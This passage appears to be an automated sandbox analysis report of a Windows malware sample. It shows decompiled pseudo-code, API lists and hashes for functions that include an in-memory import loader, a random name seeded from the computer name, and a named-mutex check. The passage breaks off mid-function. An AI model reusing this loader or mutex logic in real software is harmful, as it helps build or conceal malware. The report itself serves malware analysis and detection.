Instruction ID: fabf2a0aaa91e867d54492d1ca24e81fc8ed090543e33b3e61fa812da4358066
Opcode Fuzzy Hash: 520ef4afec62fe4405832db260c3c6b21caa087d375fb1c1d919acb3a27097cb
Instruction Fuzzy Hash: 8D116431900229ABDB218F9ADD04ADFBF79FF04720F008426F514B65A0DB708A18DAA8

Uniqueness

Uniqueness Score: -1.00%

Function 004077BA Relevance: 12.1, APIs: 8, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 81%

			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				intOrPtr* _t23;
				intOrPtr* _t24;
				void* _t27;
				void _t29;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				intOrPtr _t61;

				_push(0xffffffff);
				_push(0x40d488);
				_push(0x4076f4);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x40f94c =  *0x40f94c | 0xffffffff;
				 *0x40f950 =  *0x40f950 | 0xffffffff;
				_t23 = __p__fmode();
				_t46 =  *0x40f948; // 0x0
				 *_t23 = _t46;
				_t24 = __p__commode();
				_t47 =  *0x40f944; // 0x0
				 *_t24 = _t47;
				 *0x40f954 = _adjust_fdiv;
				_t27 = E0040793F( *_adjust_fdiv);
				_t61 =  *0x40f870; // 0x1
				if(_t61 == 0) {
					__setusermatherr(E0040793C);
				}
				E0040792A(_t27);
				_push(0x40e00c);
				_push(0x40e008);
				L00407924();
				_t29 =  *0x40f940; // 0x0
				_v112 = _t29;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x40f93c,  &_v112);
				_push(0x40e004);
				_push(0x40e000);
				L00407924();
				_t55 =  *_acmdln;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while(1) {
						__eflags =  *_t55 - 0x20;
						if(__eflags <= 0) {
							goto L7;
						}
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				L7:
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				_t69 = _v96.dwFlags & 0x00000001;
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_t40 = L00401FE7(_t69, GetModuleHandleA(0), 0, _t55, _t38);
				_v108 = _t40;
				exit(_t40);
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L0040791E();
				return _t41;
			}

0x004077bd
0x004077bf
0x004077c4
0x004077cf
0x004077d0
0x004077dd
0x004077e2
0x004077e7
0x004077ee
0x004077f5
0x004077fc
0x00407802
0x00407808
0x0040780a
0x00407810
0x00407816
0x0040781f
0x00407824
0x00407829
0x0040782f
0x00407836
0x0040783c
0x0040783d
0x00407842
0x00407847
0x0040784c
0x00407851
0x00407856
0x0040786f
0x00407875
0x0040787a
0x0040787f
0x0040788c
0x0040788e
0x00407894
0x004078d0
0x004078d0
0x004078d3
0x00000000
0x00000000
0x004078d5
0x004078d6
0x004078d6
0x00407896
0x00407896
0x00407896
0x00407897
0x0040789a
0x0040789c
0x004078a7
0x004078a9
0x004078a9
0x004078aa
0x004078aa
0x004078a7
0x004078ad
0x004078ad
0x004078b1
0x00000000
0x00000000
0x004078b7
0x004078be
0x004078c4
0x004078c8
0x004078dd
0x004078ca
0x004078ca
0x004078ca
0x004078e9
0x004078ee
0x004078f2
0x004078f8
0x004078fd
0x004078ff
0x00407902
0x00407903
0x00407904
0x0040790b

APIs

__set_app_type.MSVCRT(00000002), ref: 004077E7
__p__fmode.MSVCRT ref: 004077FC
__p__commode.MSVCRT ref: 0040780A
_initterm.MSVCRT(0040E008,0040E00C), ref: 0040784C
__getmainargs.MSVCRT(?,?,?,?,0040E008,0040E00C), ref: 0040786F
_initterm.MSVCRT(0040E000,0040E004), ref: 0040787F

Memory Dump Source

Source File: 00000002.00000002.318030609.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.318024432.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318046591.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318070936.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318079309.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: _initterm$__getmainargs__p__commode__p__fmode__set_app_type
String ID:
API String ID: 3626615345-0
Opcode ID: bfbd7971593811c7fff28e35bb39fa0d644f96314b868f8e424e213b276a966c
Instruction ID: 63d29f1c4e41429a3497612c8de1f509d91e94429ea3a2aefb8dc74a018e4fb3
Opcode Fuzzy Hash: bfbd7971593811c7fff28e35bb39fa0d644f96314b868f8e424e213b276a966c
Instruction Fuzzy Hash: 51318BB1D04344AFDB20AFA5DE49F5A7BA8BB05710F10463EF541B72E0CB786805CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00407831 Relevance: 12.1, APIs: 8, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00407831(CHAR* __ebx) {
				void* _t19;
				void _t21;
				intOrPtr _t28;
				signed int _t30;
				int _t32;
				intOrPtr* _t33;
				intOrPtr _t34;
				CHAR* _t35;
				intOrPtr _t38;
				intOrPtr* _t41;
				void* _t42;

				_t35 = __ebx;
				__setusermatherr(E0040793C);
				E0040792A(_t19);
				_push(0x40e00c);
				_push(0x40e008);
				L00407924();
				_t21 =  *0x40f940; // 0x0
				 *(_t42 - 0x6c) = _t21;
				__getmainargs(_t42 - 0x60, _t42 - 0x70, _t42 - 0x64,  *0x40f93c, _t42 - 0x6c);
				_push(0x40e004);
				_push(0x40e000);
				L00407924();
				_t41 =  *_acmdln;
				 *((intOrPtr*)(_t42 - 0x74)) = _t41;
				if( *_t41 != 0x22) {
					while(1) {
						__eflags =  *_t41 - 0x20;
						if(__eflags <= 0) {
							goto L6;
						}
						_t41 = _t41 + 1;
						 *((intOrPtr*)(_t42 - 0x74)) = _t41;
					}
				} else {
					do {
						_t41 = _t41 + 1;
						 *((intOrPtr*)(_t42 - 0x74)) = _t41;
						_t34 =  *_t41;
					} while (_t34 != _t35 && _t34 != 0x22);
					if( *_t41 == 0x22) {
						L5:
						_t41 = _t41 + 1;
						 *((intOrPtr*)(_t42 - 0x74)) = _t41;
					}
				}
				L6:
				_t28 =  *_t41;
				if(_t28 != _t35 && _t28 <= 0x20) {
					goto L5;
				}
				 *(_t42 - 0x30) = _t35;
				GetStartupInfoA(_t42 - 0x5c);
				_t52 =  *(_t42 - 0x30) & 0x00000001;
				if(( *(_t42 - 0x30) & 0x00000001) == 0) {
					_t30 = 0xa;
				} else {
					_t30 =  *(_t42 - 0x2c) & 0x0000ffff;
				}
				_t32 = L00401FE7(_t52, GetModuleHandleA(_t35), _t35, _t41, _t30);
				 *(_t42 - 0x68) = _t32;
				exit(_t32);
				_t33 =  *((intOrPtr*)(_t42 - 0x14));
				_t38 =  *((intOrPtr*)( *_t33));
				 *((intOrPtr*)(_t42 - 0x78)) = _t38;
				_push(_t33);
				_push(_t38);
				L0040791E();
				return _t33;
			}

0x00407831
0x00407836
0x0040783d
0x00407842
0x00407847
0x0040784c
0x00407851
0x00407856
0x0040786f
0x00407875
0x0040787a
0x0040787f
0x0040788c
0x0040788e
0x00407894
0x004078d0
0x004078d0
0x004078d3
0x00000000
0x00000000
0x004078d5
0x004078d6
0x004078d6
0x00407896
0x00407896
0x00407896
0x00407897
0x0040789a
0x0040789c
0x004078a7
0x004078a9
0x004078a9
0x004078aa
0x004078aa
0x004078a7
0x004078ad
0x004078ad
0x004078b1
0x00000000
0x00000000
0x004078b7
0x004078be
0x004078c4
0x004078c8
0x004078dd
0x004078ca
0x004078ca
0x004078ca
0x004078e9
0x004078ee
0x004078f2
0x004078f8
0x004078fd
0x004078ff
0x00407902
0x00407903
0x00407904
0x0040790b

APIs

__setusermatherr.MSVCRT(0040793C), ref: 00407836

Part of subcall function 0040792A: _controlfp.MSVCRT(00010000,00030000,00407842), ref: 00407934

_initterm.MSVCRT(0040E008,0040E00C), ref: 0040784C
__getmainargs.MSVCRT(?,?,?,?,0040E008,0040E00C), ref: 0040786F
_initterm.MSVCRT(0040E000,0040E004), ref: 0040787F
GetStartupInfoA.KERNEL32(?), ref: 004078BE
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004078E2
exit.MSVCRT(00000000,00000000,?,?,?,?), ref: 004078F2
_XcptFilter.MSVCRT(?,?,?,?,?,?), ref: 00407904

Memory Dump Source

Source File: 00000002.00000002.318030609.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.318024432.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318046591.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318070936.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318079309.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__setusermatherr_controlfpexit
String ID:
API String ID: 2141228402-0
Opcode ID: e2abdc3946810ebb19c889ba728617f0f692a6676515e3c370649a79fa0f1872
Instruction ID: 738ed170af38765147f9c33b7b7214e7a7d60aeb9597ff7827fffae83538cc25
Opcode Fuzzy Hash: e2abdc3946810ebb19c889ba728617f0f692a6676515e3c370649a79fa0f1872
Instruction Fuzzy Hash: F52135B2C04258AEEB20AFA5DD48AAD7BB8AF05304F24443FF581B7291D7786841CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004027DF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E004027DF(signed int* _a4) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr* _t50;
				intOrPtr _t53;
				intOrPtr _t55;
				void* _t58;
				void _t60;
				signed int _t63;
				signed int _t67;
				intOrPtr _t68;
				void* _t73;
				signed int _t75;
				intOrPtr _t87;
				intOrPtr* _t88;
				intOrPtr* _t90;
				void* _t91;

				_t90 = _a4;
				_t2 = _t90 + 4; // 0x4be8563c
				_t87 =  *_t2;
				_t50 =  *_t90 + 0x80;
				_t75 = 1;
				_v16 = _t87;
				_v12 = _t75;
				if( *((intOrPtr*)(_t50 + 4)) != 0) {
					_t73 =  *_t50 + _t87;
					if(IsBadReadPtr(_t73, 0x14) != 0) {
						L25:
						return _v12;
					}
					while(1) {
						_t53 =  *((intOrPtr*)(_t73 + 0xc));
						if(_t53 == 0) {
							goto L25;
						}
						_t8 = _t90 + 0x30; // 0xc085d0ff
						_t55 =  *((intOrPtr*)(_t90 + 0x24))(_t53 + _t87,  *_t8);
						_v8 = _t55;
						if(_t55 == 0) {
							SetLastError(0x7e);
							L23:
							_v12 = _v12 & 0x00000000;
							goto L25;
						}
						_t11 = _t90 + 0xc; // 0x317459c0
						_t14 = _t90 + 8; // 0x85000001
						_t58 = realloc( *_t14, 4 +  *_t11 * 4);
						if(_t58 == 0) {
							_t40 = _t90 + 0x30; // 0xc085d0ff
							 *((intOrPtr*)(_t90 + 0x2c))(_v8,  *_t40);
							SetLastError(0xe);
							goto L23;
						}
						_t15 = _t90 + 0xc; // 0x317459c0
						 *(_t90 + 8) = _t58;
						 *((intOrPtr*)(_t58 +  *_t15 * 4)) = _v8;
						 *(_t90 + 0xc) =  *(_t90 + 0xc) + 1;
						_t60 =  *_t73;
						if(_t60 == 0) {
							_t88 = _t87 +  *((intOrPtr*)(_t73 + 0x10));
							_a4 = _t88;
						} else {
							_t88 =  *((intOrPtr*)(_t73 + 0x10)) + _v16;
							_a4 = _t60 + _t87;
						}
						while(1) {
							_t63 =  *_a4;
							if(_t63 == 0) {
								break;
							}
							if((_t63 & 0x80000000) == 0) {
								_t32 = _t90 + 0x30; // 0xc085d0ff
								_push( *_t32);
								_t67 = _t63 + _v16 + 2;
							} else {
								_t30 = _t90 + 0x30; // 0xc085d0ff
								_push( *_t30);
								_t67 = _t63 & 0x0000ffff;
							}
							_t68 =  *((intOrPtr*)(_t90 + 0x28))(_v8, _t67);
							_t91 = _t91 + 0xc;
							 *_t88 = _t68;
							if(_t68 == 0) {
								_v12 = _v12 & 0x00000000;
								break;
							} else {
								_a4 =  &(_a4[1]);
								_t88 = _t88 + 4;
								continue;
							}
						}
						if(_v12 == 0) {
							_t45 = _t90 + 0x30; // 0xc085d0ff
							 *((intOrPtr*)(_t90 + 0x2c))(_v8,  *_t45);
							SetLastError(0x7f);
							goto L25;
						}
						_t73 = _t73 + 0x14;
						if(IsBadReadPtr(_t73, 0x14) == 0) {
							_t87 = _v16;
							continue;
						}
						goto L25;
					}
					goto L25;
				}
				return _t75;
			}

0x004027e6
0x004027ee
0x004027ee
0x004027f1
0x004027f6
0x004027f7
0x004027fa
0x00402801
0x0040280d
0x0040281a
0x0040291c
0x00000000
0x0040291f
0x00402825
0x00402825
0x0040282a
0x00000000
0x00000000
0x00402830
0x00402836
0x0040283a
0x00402840
0x004028fd
0x004028fd
0x00402903
0x00000000
0x00402903
0x00402846
0x00402851
0x00402854
0x0040285e
0x004028f0
0x004028f6
0x004028fd
0x00000000
0x004028fd
0x00402864
0x0040286a
0x0040286d
0x00402870
0x00402873
0x00402877
0x00402889
0x0040288b
0x00402879
0x0040287e
0x00402881
0x00402881
0x0040288e
0x00402891
0x00402895
0x00000000
0x00000000
0x0040289c
0x004028ab
0x004028ab
0x004028b0
0x0040289e
0x0040289e
0x0040289e
0x004028a1
0x004028a1
0x004028b7
0x004028ba
0x004028bd
0x004028c1
0x004028cc
0x00000000
0x004028c3
0x004028c3
0x004028c7
0x00000000
0x004028c7
0x004028c1
0x004028d4
0x00402909
0x0040290f
0x00402916
0x00000000
0x00402916
0x004028d6
0x004028e4
0x00402822
0x00000000
0x00402822
0x00000000
0x004028ea
0x00000000
0x00402825
0x00000000

APIs

IsBadReadPtr.KERNEL32(00000000,00000014,00000000,00000001,00000000,?!@,004023F5,00000000), ref: 00402812
realloc.MSVCRT(85000001,317459C0), ref: 00402854
IsBadReadPtr.KERNEL32(-00000014,00000014), ref: 004028DC

Strings

?!@, xrefs: 004027DF

Memory Dump Source

Source File: 00000002.00000002.318030609.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.318024432.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318046591.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318070936.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318079309.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: Read$realloc
String ID: ?!@
API String ID: 1241503663-708128716
Opcode ID: 3ef8fdaf83090ca6dd9f312f51019f46009b35537f3f51f7116a8d4e5983476b
Instruction ID: b911edbb3638e6438919fa35cb7379f64586f657f287b8edbc273cd359ebb62a
Opcode Fuzzy Hash: 3ef8fdaf83090ca6dd9f312f51019f46009b35537f3f51f7116a8d4e5983476b
Instruction Fuzzy Hash: 4841AE76A00205EFDB109F55CE49B5ABBF4FF44310F24803AE846B62D1D7B8E900DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00401225 Relevance: 10.6, APIs: 7, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00401225(intOrPtr _a4) {
				signed int _v8;
				long _v12;
				void _v410;
				long _v412;
				long _t34;
				signed int _t42;
				intOrPtr _t44;
				signed int _t45;
				signed int _t48;
				int _t54;
				signed int _t56;
				signed int _t60;
				signed int _t61;
				signed int _t62;
				void* _t71;
				signed short* _t72;
				void* _t76;
				void* _t77;

				_t34 =  *0x40f874; // 0x0
				_v412 = _t34;
				_t56 = 0x63;
				_v12 = 0x18f;
				memset( &_v410, 0, _t56 << 2);
				asm("stosw");
				GetComputerNameW( &_v412,  &_v12);
				_v8 = _v8 & 0x00000000;
				_t54 = 1;
				if(wcslen( &_v412) > 0) {
					_t72 =  &_v412;
					do {
						_t54 = _t54 * ( *_t72 & 0x0000ffff);
						_v8 = _v8 + 1;
						_t72 =  &(_t72[1]);
					} while (_v8 < wcslen( &_v412));
				}
				srand(_t54);
				_t42 = rand();
				_t71 = 0;
				asm("cdq");
				_t60 = 8;
				_t76 = _t42 % _t60 + _t60;
				if(_t76 > 0) {
					do {
						_t48 = rand();
						asm("cdq");
						_t62 = 0x1a;
						 *((char*)(_t71 + _a4)) = _t48 % _t62 + 0x61;
						_t71 = _t71 + 1;
					} while (_t71 < _t76);
				}
				_t77 = _t76 + 3;
				while(_t71 < _t77) {
					_t45 = rand();
					asm("cdq");
					_t61 = 0xa;
					 *((char*)(_t71 + _a4)) = _t45 % _t61 + 0x30;
					_t71 = _t71 + 1;
				}
				_t44 = _a4;
				 *(_t71 + _t44) =  *(_t71 + _t44) & 0x00000000;
				return _t44;
			}

0x0040122e
0x00401239
0x00401240
0x00401249
0x00401250
0x00401252
0x0040125f
0x0040126b
0x00401277
0x0040127e
0x00401280
0x00401286
0x00401289
0x0040128c
0x00401297
0x0040129d
0x00401286
0x004012a1
0x004012ae
0x004012b2
0x004012b4
0x004012b5
0x004012ba
0x004012be
0x004012c0
0x004012c0
0x004012c4
0x004012c5
0x004012ce
0x004012d1
0x004012d2
0x004012c0
0x004012d6
0x004012d9
0x004012dd
0x004012e1
0x004012e2
0x004012eb
0x004012ee
0x004012ee
0x004012f1
0x004012f4
0x004012fc

APIs

GetComputerNameW.KERNEL32(?,0000018F,?,?,00000000), ref: 0040125F
wcslen.MSVCRT(?,?,00000000), ref: 00401279
wcslen.MSVCRT(?,00000000), ref: 00401298
srand.MSVCRT(00000001,00000000), ref: 004012A1
rand.MSVCRT ref: 004012AE
rand.MSVCRT ref: 004012C0
rand.MSVCRT ref: 004012DD

Memory Dump Source

Source File: 00000002.00000002.318030609.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.318024432.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318046591.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318070936.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318079309.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: rand$wcslen$ComputerNamesrand
String ID:
API String ID: 3058258771-0
Opcode ID: b0791ced207a07d975efd615d75f91e7379ad7fc4ff6fb2c179a53625b9ec986
Instruction ID: 153b78e0bdef4b648922335b0398b7079fc1e42e5dbb3c53d325bf346215f47a
Opcode Fuzzy Hash: b0791ced207a07d975efd615d75f91e7379ad7fc4ff6fb2c179a53625b9ec986
Instruction Fuzzy Hash: FA212833A00318ABD7119B65ED81BDD77A8EB45354F1100BBF948F71C0CA759EC28BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00407070 Relevance: 10.6, APIs: 7, Instructions: 74
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407070(char* _a4, char* _a8) {
				char _v264;
				void _v524;
				long _t16;
				char* _t30;
				char* _t31;
				char* _t36;
				char* _t38;
				int _t40;
				void* _t41;

				_t30 = _a4;
				if(_t30 != 0 && GetFileAttributesA(_t30) == 0xffffffff) {
					CreateDirectoryA(_t30, 0);
				}
				_t36 = _a8;
				_t16 =  *_t36;
				if(_t16 != 0) {
					_t38 = _t36;
					_t31 = _t36;
					do {
						if(_t16 == 0x2f || _t16 == 0x5c) {
							_t38 = _t31;
						}
						_t16 = _t31[1];
						_t31 =  &(_t31[1]);
					} while (_t16 != 0);
					if(_t38 != _t36) {
						_t40 = _t38 - _t36;
						memcpy( &_v524, _t36, _t40);
						 *(_t41 + _t40 - 0x208) =  *(_t41 + _t40 - 0x208) & 0x00000000;
						E00407070(_t30,  &_v524);
					}
					_v264 = _v264 & 0x00000000;
					if(_t30 != 0) {
						strcpy( &_v264, _t30);
					}
					strcat( &_v264, _t36);
					_t16 = GetFileAttributesA( &_v264);
					if(_t16 == 0xffffffff) {
						return CreateDirectoryA( &_v264, 0);
					}
				}
				return _t16;
			}

0x0040707a
0x00407080
0x00407091
0x00407091
0x00407097
0x0040709a
0x0040709e
0x004070a5
0x004070a7
0x004070a9
0x004070ab
0x004070b1
0x004070b1
0x004070b3
0x004070b6
0x004070b7
0x004070bd
0x004070bf
0x004070ca
0x004070cf
0x004070df
0x004070e4
0x004070e7
0x004070f1
0x004070fb
0x00407101
0x0040710a
0x00407118
0x00407121
0x00000000
0x0040712c
0x00407121
0x00407135

APIs

GetFileAttributesA.KERNEL32(?,?,?), ref: 00407083
CreateDirectoryA.KERNEL32(?,00000000), ref: 00407091
memcpy.MSVCRT(?,0000002F,0000002F,?,?,?), ref: 004070CA
strcpy.MSVCRT(00000000,?,?,?), ref: 004070FB
strcat.MSVCRT(00000000,0000002F,?,?), ref: 0040710A
GetFileAttributesA.KERNEL32(00000000,?,?), ref: 00407118
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0040712C

Memory Dump Source

Source File: 00000002.00000002.318030609.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.318024432.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318046591.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318070936.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318079309.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: AttributesCreateDirectoryFile$memcpystrcatstrcpy
String ID:
API String ID: 2935503933-0
Opcode ID: 0838382564994867704b48d197d9141456e9ef10b941a736ac2fad3accdc9566
Instruction ID: 50ba023859918e707bf45bf33fbe73a6a33da9a39eec2eddc6b78618a8cc3524
Opcode Fuzzy Hash: 0838382564994867704b48d197d9141456e9ef10b941a736ac2fad3accdc9566
Instruction Fuzzy Hash: 1A112B72C0821456CB305B749D88FD7776C9B11320F1403BBE595B32C2DA78BD898669

Uniqueness

Uniqueness Score: -1.00%

Function 00401EFF Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401EFF(intOrPtr _a4) {
				char _v104;
				void* _t9;
				void* _t11;
				void* _t12;

				sprintf( &_v104, "%s%d", "Global\\MsWinZonesCacheCounterMutexA", 0);
				_t12 = 0;
				if(_a4 <= 0) {
					L3:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t9 = OpenMutexA(0x100000, 1,  &_v104);
					if(_t9 != 0) {
						break;
					}
					Sleep(0x3e8);
					_t12 = _t12 + 1;
					if(_t12 < _a4) {
						continue;
					}
					goto L3;
				}
				CloseHandle(_t9);
				_t11 = 1;
				return _t11;
			}

0x00401f16
0x00401f1c
0x00401f24
0x00401f4c
0x00000000
0x00000000
0x00000000
0x00000000
0x00401f26
0x00401f26
0x00401f31
0x00401f39
0x00000000
0x00000000
0x00401f40
0x00401f46
0x00401f4a
0x00000000
0x00000000
0x00000000
0x00401f4a
0x00401f52
0x00401f5a
0x00000000

APIs

sprintf.MSVCRT(?,%s%d,Global\MsWinZonesCacheCounterMutexA,00000000), ref: 00401F16
OpenMutexA.KERNEL32(00100000,00000001,?), ref: 00401F31
Sleep.KERNEL32(000003E8), ref: 00401F40
CloseHandle.KERNEL32(00000000), ref: 00401F52

Strings

%s%d, xrefs: 00401F10
Global\MsWinZonesCacheCounterMutexA, xrefs: 00401F08

Memory Dump Source

Source File: 00000002.00000002.318030609.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.318024432.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318046591.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318070936.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318079309.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: CloseHandleMutexOpenSleepsprintf
String ID: %s%d$Global\MsWinZonesCacheCounterMutexA
API String ID: 2780352083-2959021817
Opcode ID: d195781efe0b704a0c45d33d3827b966fde6c598e7eccee7cfdb972a19423a06
Instruction ID: f4a3b48a0bafa41ae68b0177be176e29d76f271436d11399ade0a1af8f7a19ee
Opcode Fuzzy Hash: d195781efe0b704a0c45d33d3827b966fde6c598e7eccee7cfdb972a19423a06
Instruction Fuzzy Hash: 92F0E931A40305BBDB20EBA49E4AB9B7758AB04B40F104036F945FA0D2DBB8D54586D8

Uniqueness

Uniqueness Score: -1.00%

Function 00403A77 Relevance: 9.1, APIs: 6, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E00403A77(void* __ecx, void* _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				void* _v12;
				char _v16;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v48;
				signed int _t121;
				int _t124;
				intOrPtr* _t126;
				intOrPtr _t127;
				int _t131;
				intOrPtr* _t133;
				intOrPtr _t135;
				intOrPtr _t137;
				signed int _t139;
				signed int _t140;
				signed int _t143;
				signed int _t150;
				intOrPtr _t160;
				int _t161;
				int _t163;
				signed int _t164;
				signed int _t165;
				intOrPtr _t168;
				void* _t169;
				signed int _t170;
				signed int _t172;
				signed int _t175;
				signed int _t178;
				intOrPtr _t194;
				void* _t195;
				void* _t196;
				void* _t197;
				intOrPtr _t198;
				void* _t201;

				_t197 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
					_push(0x40d570);
					_push( &_v16);
					L0040776E();
				}
				_t121 = _a12;
				if(_t121 == 0) {
					L15:
					__imp__??0exception@@QAE@ABQBD@Z(0x40f574);
					_push(0x40d570);
					_push( &_v16);
					L0040776E();
					_push( &_v16);
					_push(0);
					_push(_t197);
					_t198 = _v36;
					_t194 = _v32;
					_t168 =  *((intOrPtr*)(_t198 + 0x30));
					_t160 =  *((intOrPtr*)(_t198 + 0x34));
					_t71 = _t194 + 0xc; // 0x40d568
					_v48 =  *_t71;
					_v32 = _t168;
					if(_t168 > _t160) {
						_t160 =  *((intOrPtr*)(_t198 + 0x2c));
					}
					_t75 = _t194 + 0x10; // 0x19930520
					_t124 =  *_t75;
					_t161 = _t160 - _t168;
					if(_t161 > _t124) {
						_t161 = _t124;
					}
					if(_t161 != 0 && _a8 == 0xfffffffb) {
						_a8 = _a8 & 0x00000000;
					}
					 *((intOrPtr*)(_t194 + 0x14)) =  *((intOrPtr*)(_t194 + 0x14)) + _t161;
					 *(_t194 + 0x10) = _t124 - _t161;
					_t126 =  *((intOrPtr*)(_t198 + 0x38));
					if(_t126 != 0) {
						_t137 =  *_t126( *((intOrPtr*)(_t198 + 0x3c)), _t168, _t161);
						 *((intOrPtr*)(_t198 + 0x3c)) = _t137;
						_t201 = _t201 + 0xc;
						 *((intOrPtr*)(_t194 + 0x30)) = _t137;
					}
					if(_t161 != 0) {
						memcpy(_v12, _a4, _t161);
						_v12 = _v12 + _t161;
						_t201 = _t201 + 0xc;
						_a4 = _a4 + _t161;
					}
					_t127 =  *((intOrPtr*)(_t198 + 0x2c));
					if(_a4 == _t127) {
						_t169 =  *((intOrPtr*)(_t198 + 0x28));
						_a4 = _t169;
						if( *((intOrPtr*)(_t198 + 0x34)) == _t127) {
							 *((intOrPtr*)(_t198 + 0x34)) = _t169;
						}
						_t99 = _t194 + 0x10; // 0x19930520
						_t131 =  *_t99;
						_t163 =  *((intOrPtr*)(_t198 + 0x34)) - _t169;
						if(_t163 > _t131) {
							_t163 = _t131;
						}
						if(_t163 != 0 && _a8 == 0xfffffffb) {
							_a8 = _a8 & 0x00000000;
						}
						 *((intOrPtr*)(_t194 + 0x14)) =  *((intOrPtr*)(_t194 + 0x14)) + _t163;
						 *(_t194 + 0x10) = _t131 - _t163;
						_t133 =  *((intOrPtr*)(_t198 + 0x38));
						if(_t133 != 0) {
							_t135 =  *_t133( *((intOrPtr*)(_t198 + 0x3c)), _t169, _t163);
							 *((intOrPtr*)(_t198 + 0x3c)) = _t135;
							_t201 = _t201 + 0xc;
							 *((intOrPtr*)(_t194 + 0x30)) = _t135;
						}
						if(_t163 != 0) {
							memcpy(_v12, _a4, _t163);
							_v12 = _v12 + _t163;
							_a4 = _a4 + _t163;
						}
					}
					 *(_t194 + 0xc) = _v12;
					 *((intOrPtr*)(_t198 + 0x30)) = _a4;
					return _a8;
				} else {
					_t170 =  *(_t197 + 0x3cc);
					if(_t121 % _t170 != 0) {
